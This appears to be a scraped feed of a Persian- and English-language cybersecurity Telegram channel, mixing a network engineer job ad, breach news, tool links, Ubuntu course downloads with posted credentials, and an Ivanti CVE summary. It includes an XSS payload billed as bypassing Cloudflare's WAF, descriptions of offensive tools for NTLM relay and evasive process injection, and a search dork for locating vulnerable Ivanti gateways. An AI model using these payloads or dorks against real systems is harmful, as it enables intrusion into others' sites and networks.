Network Engineer
NY-Rochester, As part of a global manufacturing leader in Aerospace and DoD components has been rapidly expanding for the 10th year in row. They are expanding their InfoSec team and looking for your expertise. This Jobot Job is hosted by: Tyler Keear Are you a fit? Easy Apply now by clicking the "Quick Apply" button and sending us your resume. Salary: $90,000 - $120,000 per year A bit about us: As part of a glo

http://jobview.monster.com/Network-Engineer-Job-Rochester-NY-US-269122281.aspx

#US #Network Engineer

@Engineer_Computer

🗒 bypass XSS Cloudflare WAF

Encoded Payload
"><track/onerror='confirm\%601\%60'>

Clean Payload
"><track/onerror='confirm1'>
@Engineer_Computer

🗒 TBHM - The Bug Hunter's Methodology
@Engineer_Computer

🗒 File Upload Cheatsheet

@Engineer_Computer

⚡️Google Agrees to Pay $350 Million to Settle Class Action Lawsuit Over Google+ User Data Leak

According to a document filed in the U.S. Court for the Northern District of California, people who purchased Google stock between April 23, 2018, and April 30, 2019, will be able to apply for a share of the settlement.

There will be a notification for eligible investors and Google has a portal with relevant information.

@Engineer_Computer

وقتی NSA از هوش مصنوعی برای کشف حملات استفاده میکنه
#NSA

https://industrialcyber.co/critical-infrastructure/senior-us-cybersecurity-official-reveals-use-of-ai-to-counter-hackers-targeting-critical-infrastructure/

@Engineer_Computer

دوستان ابزارهای Sysintenals رو دریابید
https://live.sysinternals.com/

@Engineer_Computer

NTLM Relay Gat - streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.
https://github.com/ad0nis/ntlm_relay_gat

@Engineer_Computer

This repository contains multiple PowerShell noscripts that can help you respond to cyber attacks on Windows Devices.
https://github.com/Bert-JanP/Incident-Response-Powershell

@Engineer_Computer

Indirect Dynamic Syscall, SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing + Api resolving from TIB + API hashing
https://github.com/reveng007/DarkWidow

@Engineer_Computer

🔖The jsluice++ extension was published yesterday, which is a Burp Suite extension designed to passively and actively scan javanoscript traffic using the jsluice CLI.

The extension utilizes jsluice's ability to extract URLs, paths and secrets from static JavaScript files and integrates it with Burp Suite, allowing you to easily scan javanoscript traffic from Burp Suite's Sitemap or Proxy, while offering a user-friendly interface for data validation and many additional useful features.

github: https://github.com/0x999-x/jsluicepp

#BugBounty #BugBountyTools
@Engineer_Computer

شاید بپرسید با مسواک هم میشه مگه اتک زد که ناگهان این عکس رو میبینید که مال 5 روز پیشه ! بله یه حمله دیداس با مسواک هوشمند ، هکرها این مسواک ها را به یک ارتش بات نت تبدیل کرده بودند و با لشکری از مسواکهای به یک شرکت سوئیسی حمله کردند و آنرا برای چندین ساعت از کار انداختند و باعث میلیون ها یورو خسارت شدند!
#مسواک
@Engineer_Computer

دانلود رایگان دوره کانفیگ سرور لینوکس Ubuntu

جلسه اول :
username : ff7f4356e44
password : c2bf95c6e9fcfdf95e0dea9b38b31
https://cafenode.ir/ConfigServer/01/01.zip
جلسه دوم :
username : 9002b61dc9002b61dc
password : 8cb93d1c1e1c983df904096e0cfdf7b
https://cafenode.ir/ConfigServer/02/ch02.zip
جلسه سوم :
username : f27d49190277eae81143
password : 2f673ae17d203fdf4229
https://cafenode.ir/ConfigServer/03/03.zip
جلسه چهارم :‌
username : eb99b60a7fb3c59471fe
password : efa9978929208a1a2d231d91ee897bdb3a95a894bf8a
https://cafenode.ir/ConfigServer/04/ch04.zip
جلسه پنجم :‌
username : 8697e6fef5fc9
password : 9b1f85cbe9cf0aee8fb4c39ebe6
http://cafenode.ir/ConfigServer/05/05.zip

@Engineer_Computer

👆👆👆👆👆👆👆👆👆👆👆👆👆👆👆

فایل های Note دوره کانفیگ سرور لینوکس Ubuntu

سرفصل ها :‌
آموزش نصب و راه اندازی DNS and BIND 9
اتصال دامنه به سرور
ایجاد subdomain
نصب و راه اندازی وب سرور nginx
ایجاد virtual host در nginx
آموزش ساخت reverse proxy با nginx
فعال کردن SSL برای دامنه
ایجاد وب سرور با apache و ایجاد virtual host
نصب دیتابیس های mongodb - mysql - postgresql - redis
نصب php - go - rust - node js
کانفیگ firewall سرور
نصب و راه اندازی docker و docker compose
نصب و راه اندازی سرویس ارسال و دریافت ایمیل postfix - dovecot

@Engineer_Computer

❌ خبرگزاری مجلس شورای اسلامی (خانه ملت) هک شد

🔺 اکنون این سایت تا رفع مشکل از دسترس خارج شده است.

#خبری #هک
@Engineer_Computer

#linux #tools
@Engineer_Computer

🚨CVE-2024-22024: XXE in Ivanti Connect Secure, 8.8 rating❗️

- ایوانتی(Ivanti)، شرکتی که راه حل‌های VPN و کنترل دسترسی به شبکه را ارائه می‌کند، آسیب‌پذیری جدیدی (CVE-2024-22024) را فاش کرده است که بر روی Connect Secure، Policy Secure، و گیت وی های ZTA تأثیر می‌گذارد.
- این آسیب‌پذیری یک نقطه ضعف (XXE) در کامپوننت SAML گیت وی هاست که می‌تواند به مهاجم اجازه دهد بدون احراز هویت به منابع محدودی دسترسی پیدا کند.
- این آسیب‌پذیری در طول بررسی داخلی و آزمایش کد آن توسط Ivanti پیدا شد، و هیچ مدرکی مبنی بر سوء استفاده از آن وجود ندارد.
- ایوانتی وصله‌هایی را برای نسخه‌های آسیب‌دیده گیت وی ها منتشر کرده است و به مشتریان توصیه می‌کند در اسرع وقت آنها را اعمال کنند.
- این آسیب پذیری در سیستم امتیازدهی CVSS دارای امتیاز 8.3 از 10 است که نشان دهنده شدت بالای 4 است.

Search at Netlas.io:
👉🏻 Link: https://nt.ls/0AKq9
👉🏻 Dork: http.body:"welcome.cgi?p=logo"

Vendor's advisory: https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US

@Engineer_Computer